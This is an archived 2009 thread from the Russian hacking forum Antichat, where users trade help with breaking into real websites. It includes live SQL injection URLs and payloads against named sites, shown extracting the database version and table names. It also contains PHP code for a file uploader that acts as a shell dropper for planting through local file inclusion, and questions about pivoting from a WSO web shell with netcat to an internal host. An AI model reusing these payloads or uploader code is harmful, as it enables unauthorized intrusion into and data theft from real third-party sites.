ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
20.12.2009, 00:01
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
когда я говорил про LFI, то не имел в виду load_file, если вы не встречали таких скулей, где одновременно и скуля и LFI - то еще встретите. Просто надо внимательно читать ошибки, которые выводятся на экран.
|
|
|
20.12.2009, 00:07
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Сообщение от Матня
Подскажите плиз. Мне нужен скрипт для залития аплоадера файлов через /proc/self/environ т.е. этот скрипт заливает аплоадер в корень сайта. раньше мне чел под ником попугай дал его. но у меня полетел сервак и скрипт пропал. может есть у кого.
Что значит залитие аплоадера файлов?
Через /proc/self/environ можно залить шелл. Читай, например, здесь.
|
|
|
|
20.12.2009, 05:29
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от [aywo]
чем он правильнее???
скуля не принтабельна, поэтому и не выводится ниодного поля
а вот и принтабельное поле 2 3 ))
http://www.wallstreetcorner.com/new_lop.html?ID=209+union+select+1,2,3,4+from+WSCO pinion%00&Unique=yes
тока дальше не подчиняется ((
|
|
|
|
20.12.2009, 12:09
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
люди,знаю, что много раз обсуждалось, но все же, на фтп на все папки стоят права 755,а на файлы 644, ничего не могу залить. Можно ли как то обойти эту проблему?
P.S. Если есть мануалы, с радостью почитаю
Последний раз редактировалось jecka3000; 20.12.2009 в 12:45..
|
|
|
|
20.12.2009, 13:05
|
|
Познающий
Регистрация: 09.10.2009
Сообщений: 31
Провел на форуме:
287607
Репутация:
19
|
|
Помогите будьласка! Есть шелл . Через шелл доступ к жесткому диску виддаленного компа (сервера) в частности диску С:\. В шели есть возможность выполнения консольных команд(шелл WSO 2.3, ОС Виндовс). Залил неткат . Могу создать отдаленого юзера . Как мне пидконектитись к тому компа если там ип 192.168.2.1 ??
|
|
|
|
20.12.2009, 13:06
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055
Репутация:
347
|
|
Сообщение от Root-access
Что значит залитие аплоадера файлов?
Через /proc/self/environ можно залить шелл. Читай, например, здесь. Мне кажется Матня имел ввиду просто аплоадер файлов
Код:
<form enctype=multipart/form-data method=post>
<input name=x type=file><input type=submit></form>
<?php isset($_FILES[x])?(is_uploaded_file($_FILES[x][tmp_name])?(@copy($_FILES[x][tmp_name],$_FILES[x][name])):0):0; ?>
Ну а код, который этот аплоадер создает:
Код:
<?php $f = fopen('up.php','w');fwrite($f,'<form enctype=multipart/form-data method=post><input name=x type=file><input type=submit></form><?php isset($_FILES[x])?(is_uploaded_file($_FILES[x][tmp_name])?(@copy($_FILES[x][tmp_name],$_FILES[x][name])):0):0; ?>');fclose($f); ?>
|
|
|
|
20.12.2009, 17:19
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Сообщение от Cybersteger
Помогите будьласка! Есть шелл . Через шелл доступ к жесткому диску виддаленного компа (сервера) в частности диску С:\. В шели есть возможность выполнения консольных команд(шелл WSO 2.3, ОС Виндовс). Залил неткат . Могу создать отдаленого юзера . Как мне пидконектитись к тому компа если там ип 192.168.2.1 ??
http://forum.antichat.ru/showthread.php?t=107655
|
|
|
|
20.12.2009, 20:06
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
http://www.jetset.com.ua/rus/magazine/search/
в поле "Что искать" вводим ' и эррор. Это просто эррор или скуля? нет возможности проверить точно, поэтому прошу глянуть.
|
|
|
|
20.12.2009, 20:28
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
Сообщение от $n@ke
в поле "Что искать" вводим ' и эррор. Это просто эррор или скуля? нет возможности проверить точно, поэтому прошу глянуть.
Да, скуля, в строку поиска вводим:
Код:
%'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1
Получаем:
MySQL Error: 1060 (Duplicate column name ' 5.0.51a')
__________________
Feci, quod potui. Faciant meliora potentes.
|
|
|
|
20.12.2009, 20:32
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552
Репутация:
1668
|
|
2 $n@ke
Код:
xek%')/**/union/**/select/**/*/**/from/**/(select/**/*/**/from/**/(select/**/name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),1),name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),1))a)b#
Duplicate column name ' CHARACTER_SETS' |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
